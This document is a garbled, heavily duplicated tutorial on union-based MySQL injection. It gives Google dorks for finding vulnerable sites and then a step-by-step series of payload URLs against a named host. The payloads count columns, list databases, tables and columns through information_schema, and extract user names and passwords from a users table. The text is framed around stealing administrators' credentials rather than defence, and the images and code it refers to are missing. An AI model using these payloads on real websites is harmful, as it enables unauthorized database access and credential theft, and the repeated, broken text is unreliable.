MySQL Injection is not a method. We can give a MySQL injection attack using vulnerabilities of MySQL versions, language used to write a web site or programming techniques to use this web
site. Here I explain about Union Exploitation Technique.
site. Here I explain about Union Exploitation Technique.
Finding a MySQL Injection vulnerable website is little bit difficult. Also finding a web site
which have vulnerabilities is relatively difficult. So we have to use Google Dorks to find vulnerable |
website.
which have vulnerabilities is relatively difficult. So we have to use Google Dorks to find vulnerable |
website.
Examples for Google Dorks.
.php?id=
.php?news=
.php?game=
.php?article=
Let’s assume we can found a vulnerable web-page as a www.example.com/index.php?id=1
Here we send a get request to www.example.com/index.php this php file as id=1. Then php file take
the data where id=1 from the database and show in to us.
the data where id=1 from the database and show in to us.
Those web sites store the data in MySQL database.
PHP script.
Now you can see when the id=1, database select where id=1, then show the title in the title of the web page and content in the content of the web-page.
Here is the PHP script for this operation.
After that we can get these types of process.
.php?id=
.php?news=
.php?game=
.php?article=
Here the SQL statement is SELECT * FROM pages where id=$id;
We can run this illegally, using SQL statement at the end of the get request’s value. But every website haven’t this weakness. So before doing this attack we have to check weather this website
have this weakness.
have this weakness.
Identifying SQL Injection Vulnerabilities
Type any URL and put an apostrophe at the end of the URL and try to go to the web site.
If you have an error like this, the website can have a Vulnerability. Reason for this error is to
run a different SQL statement after putting the apostrophe.
run a different SQL statement after putting the apostrophe.
SELECT * FROM pages where id=1';
This error comes because of this operation is Contrary to the SQL syntax. Now we know
these types of Statements run on the columns on the table. In this example all the Columns are
running on the pages table. Now we should know how many columns we have. So if we know
numbers of columns we can use union clause.
these types of Statements run on the columns on the table. In this example all the Columns are
running on the pages table. Now we should know how many columns we have. So if we know
numbers of columns we can use union clause.
Find number of columns that we select
We know order by clause that use to SQL in ascending or descending. Assume that there are 5 columns. If we want to sort from 1st column, we can do it. Then if we want to sort from 3rd column, we can do it, again we want to sort from 5th, this one also we can do, But if we want to sort from 6th column we can’t do it. Because we haven’t any column called 6th. So we have an error.
So we can sort a column number that we have, as well as we can’t sort a column number that we
haven’t.
So that we search the column number from the beginning.
After finding number of columns like this we can use union clause. Union clause is used to use two
select statements. But the number of columns in the tables should be equal. Now we know how many columns are selected. So we haven’t any problem.
select statements. But the number of columns in the tables should be equal. Now we know how many columns are selected. So we haven’t any problem.
Using a union clause
http://example.net.hostinghood.com/sql2/index.php?id=1 union select 1, 2, 3
If we use all the selected columns like this, put the values 1, 2, 3 are entered respectively.
Here no need to use 1, 2, and 3. And we can use any 3 integers. But the same number is not used
twice. Because we need to find columns separately.
Here no need to use 1, 2, and 3. And we can use any 3 integers. But the same number is not used
twice. Because we need to find columns separately.
Example for working SQL statement to this operation.
SELECT * FROM pages where id=1 union select 1, 2, 3;
Then we should run this statement in the database.
When we give two selected statements, they select two rows. Second row having integers that we gave. In these type of situation php script take data from the first row. So we have to delete
corrected data in the first row.
corrected data in the first row.
So we have to give an ID which does not belong to this database. So we can use big numbers such as id=2000 or negative numbers such as id=-1 We use these any number because we don’t use
these types of numbers to the id.
these types of numbers to the id.
Now you can log into the 2nd and 3rd web- pages. That means data on the 2nd and 3rd
columns are displayed on the web- page. So now we can run any statement on the 2nd and 3rd
columns. These values can be shown in the web-page.
columns are displayed on the web- page. So now we can run any statement on the 2nd and 3rd
columns. These values can be shown in the web-page.
When we run 1st column in the statement, the result is not displayed anywhere.
When we run the 2nd column in the statement that means the statement is entered instead of
2nd integer. Using version() function we can show the MySQL version.
2nd integer. Using version() function we can show the MySQL version.
Get all the Database names
Here we can get the data only from the table. But it is not very useful. As we want to take
users or admins’ Username, Password or Email address. But normally the table that we use to store
the web page data is not used to store the user’s details. So we should access to other tables. Before
doing
this, we should know database name. If not, we can’t run it properly.
users or admins’ Username, Password or Email address. But normally the table that we use to store
the web page data is not used to store the user’s details. So we should access to other tables. Before
doing
this, we should know database name. If not, we can’t run it properly.
There is a table called Schemata table inside the information_schema database. In this table
there is a column called schema_name and it has all databases names.
there is a column called schema_name and it has all databases names.
Example:- example.net.hostinghood.com/sql2/index.php?
id=20000 union select 1, schema_name, 3 from information_schema.schemata
id=20000 union select 1, schema_name, 3 from information_schema.schemata
Send a get request like this.
Now we can see only the information_schema database name. Reason for this is 1st row
consist of information of information_schema database. When select the multiple rows php script
shows data of only the first row.
consist of information of information_schema database. When select the multiple rows php script
shows data of only the first row.
We use into group_concat() function. This function can separate the row data by commas. So
it will give a request like this.
it will give a request like this.
example.net.hostinghood.com/sql2/index.php?id=20000 union select 1, group_concat(schema_name),3 from information_schema.schemata
Now show the database names in order.
Get all table names.
Now we know what the database name is. So we can get the table names from the tables table in the information_schema database. Here we want only the table names in current database because we should use where clause. With the reference of this can have the multiple tables there can be
several rows. Before getting the all the row data we should use group_concat function.
several rows. Before getting the all the row data we should use group_concat function.
Example:- Example.net.hostinghood.com/sql2/index.php?
id=20000 union select 1, group_concat(table_name), 3 from information_schema.tables where
table_schema=database()
table_schema=database()
Now we can see all table names. Now we want to see column names inside the table. It’s also we can use information_schema.columns command to retrieve from the table.
Example:-
example.net.hostinghood.com/sql2/index.php?id=20000 union select 1, group_concat(column_name),3 from information_schema.columns where table_schema=database()
Now we can get id, content, title, name, and password columns in users, pages table.
Now here column names are different from each other. So we can get the data from the
column without any problem.
column without any problem.
Example:-
example.net.hostinghood.com/sql2/index.php?id=20000 union select 1, group_concat(name,pw),3 from users,pages
But here there are two data repetition because we selected all the two tables. So that there is a problem because having two columns in same name in two tables. So we have to do like this.
It is important to us the data from the name, password columns. So that we can guess those
two are not in the pages table but in the users table. So we can send the request like this.
two are not in the pages table but in the users table. So we can send the request like this.
example.net.hostinghood.com/sql2/index.php?id=20000 union select 1, group_concat(name,pw),3 from users.
Now can retrieve data without repetitious.